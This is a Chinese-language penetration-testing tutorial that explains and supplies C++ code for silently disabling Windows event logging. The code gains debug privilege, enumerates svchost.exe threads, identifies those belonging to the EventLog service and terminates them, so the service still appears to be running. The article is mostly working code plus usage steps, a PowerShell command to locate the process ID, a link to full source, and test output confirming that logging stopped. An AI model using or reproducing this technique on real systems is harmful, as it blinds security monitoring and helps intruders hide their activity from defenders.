导语:使用API NtQueryInformationThread和I_QueryTagInformation获取线程对应的服务,关闭对应日志记录功能的线程,能够破坏日志功能,并且Windows Event Log服务没有被破坏,状态仍为正在运行。
0x00 前言
在上篇文章《渗透技巧——Windows日志的删除与绕过》中提到一个绕过Windows日志监控的思路:使用API NtQueryInformationThread和I_QueryTagInformation获取线程对应的服务,关闭对应日志记录功能的线程,能够破坏日志功能,并且Windows Event Log服务没有被破坏,状态仍为正在运行。本文将要对其详细介绍,分享使用c++在编写程序上需要注意的细节。
0x01 简介
本文将要介绍以下内容:
程序自身提权 遍历进程中的所有线程 根据线程tid,获取对应的进程pid 根据线程tid,获取对应的服务名称 结束线程
0x02 程序实现
开发工具: VS2012
开发语言: c++
1、定位eventlog服务对应进程svchost.exe的pid
powershell代码如下:
Get-WmiObject -Class win32_service -Filter "name = 'eventlog'" | select -exp ProcessId
通过回显能够找出进程svchost.exe的pid
2、程序自身提权,以管理员权限执行
因为进程svchost.exe为系统权限,所以对其线程进行操作也需要高权限,因此,程序需要先提升至管理员权限
提权至管理员权限的代码如下:
BOOL SetPrivilege() { HANDLE hToken; TOKEN_PRIVILEGES NewState; LUID luidPrivilegeLUID; if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)||!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luidPrivilegeLUID)) { printf("SetPrivilege Errorn"); return FALSE; } NewState.PrivilegeCount = 1; NewState.Privileges[0].Luid = luidPrivilegeLUID; NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL)) { printf("AdjustTokenPrivilege Errron"); return FALSE; } return TRUE; }
3、遍历进程中的所有线程
定位进程svchost.exe后,需要遍历该进程中的所有线程,然后进行筛选
根据进程pid遍历其子进程的代码如下:
BOOL ListProcessThreads(DWORD pid) { HANDLE hThreadSnap = INVALID_HANDLE_VALUE; THREADENTRY32 te32; hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); if (hThreadSnap == INVALID_HANDLE_VALUE) return(FALSE); te32.dwSize = sizeof(THREADENTRY32); if (!Thread32First(hThreadSnap, &te32)) { printf("Thread32First"); CloseHandle(hThreadSnap); return(FALSE); } do { if (te32.th32OwnerProcessID == pid) printf("tid= %dn",te32.th32ThreadID); } while (Thread32Next(hThreadSnap, &te32)); CloseHandle(hThreadSnap); return(TRUE); }
获取进程中的所有线程tid,如下图
4、判断线程是否满足条件
筛选出Windows Event Log服务对应的线程,方法如下:
根据线程tid,获取对应的服务名称
可参考以下链接:
https://wj32.org/wp/2010/03/30/howto-use-i_querytaginformation/
文中提到,需要使用三个API:
NtQueryInformationThread:
来自ntdll.dll dll路径:%WinDir%System32
使用IDA对其验证,查看ntdll.dll的导出函数,能够发现API函数NtQueryInformationThread,如下图
具体使用方式:
typedef NTSTATUS (WINAPI* FN_NtQueryInformationThread)(HANDLE, THREAD_INFORMATION_CLASS, PVOID, ULONG, PULONG); FN_NtQueryInformationThread pfnNtQueryInformationThread = NULL; pfnNtQueryInformationThread = (FN_NtQueryInformationThread)GetProcAddress(GetModuleHandle(_T("ntdll")), "NtQueryInformationThread");
I_QueryTagInformation:
来自advapi32.dll dll路径:%WinDir%System32下
使用IDA对其验证,查看advapi32.dll的导出函数,能够发现API函数I_QueryTagInformation,如下图
具体使用方式:
typedef ULONG (WINAPI* FN_I_QueryTagInformation)(PVOID, SC_SERVICE_TAG_QUERY_TYPE, PSC_SERVICE_TAG_QUERY); FN_I_QueryTagInformation pfnI_QueryTagInformation = NULL; HMODULE advapi32 = LoadLibrary(L"advapi32.dll"); pfnI_QueryTagInformation = (FN_I_QueryTagInformation)GetProcAddress(advapi32, "I_QueryTagInformation");
NtReadVirtualMemory:
可使用ReadProcessMemory代替
更为完整的代码实例可参考如下链接:
该文章分享了一段代码,提供进程pid和线程tid,能够获取对应的服务名称
当然,我们需要对该代码作改进,不需要提供进程pid,只需要线程tid就好
根据线程tid获取对应进程pid,代码如下:
BOOL QueryThreadBasicInformation(HANDLE hThread) { typedef NTSTATUS (WINAPI* FN_NtQueryInformationThread)(HANDLE, THREAD_INFORMATION_CLASS, PVOID, ULONG, PULONG); FN_NtQueryInformationThread pfnNtQueryInformationThread = NULL; pfnNtQueryInformationThread = (FN_NtQueryInformationThread)GetProcAddress(GetModuleHandle(_T("ntdll")), "NtQueryInformationThread"); THREAD_BASIC_INFORMATION threadBasicInfo; LONG status = pfnNtQueryInformationThread(hThread, ThreadBasicInformation, &threadBasicInfo,sizeof(threadBasicInfo), NULL); printf("process ID is %un",threadBasicInfo.clientId.uniqueProcess); printf("Thread ID is %un",threadBasicInfo.clientId.uniqueThread); return TRUE; }
测试程序能够通过tid获取相关进程pid,运行如下图
至此,我们能够根据提供的线程tid判断出对应的进程pid和服务名称
接着,需要添加判断功能,筛选出eventlog服务,进行下一步操作:结束线程
5、结束线程
同结束进程类似,需要提供进程tid,代码如下:
void TerminateEventlogThread(DWORD tid) { HANDLE hThread = OpenThread(0x0001,FALSE,tid); if(TerminateThread(hThread,0)==0) printf("--> Error !n"); else printf("--> Success !n"); CloseHandle(hThread); }
综上,将所有功能集成到一个程序中,使用时只需要提供进程svchost.exe的pid就好
完整源代码下载地址:
https://github.com/3gstudent/Windwos-EventLog-Bypass/blob/master/WindowsEventLogBypass.cpp
0x03 实际测试
获取进程svchost.exe的pid:
Get-WmiObject -Class win32_service -Filter "name = 'eventlog'" | select -exp ProcessId
获得pid为916
运行WindowsEventLogBypass.exe,添加pid
参数如下:
WindowsEventLogBypass.exe 916
实际测试,如下图
成功结束线程,日志功能失效,如下图
0x04 小结
本文介绍了使用c++编写程序绕过Windows日志的技巧,同Halil [email protected]分享的Powershell工程Invoke-Phant0m结合学习,希望能够帮助大家更好的了解这项技术。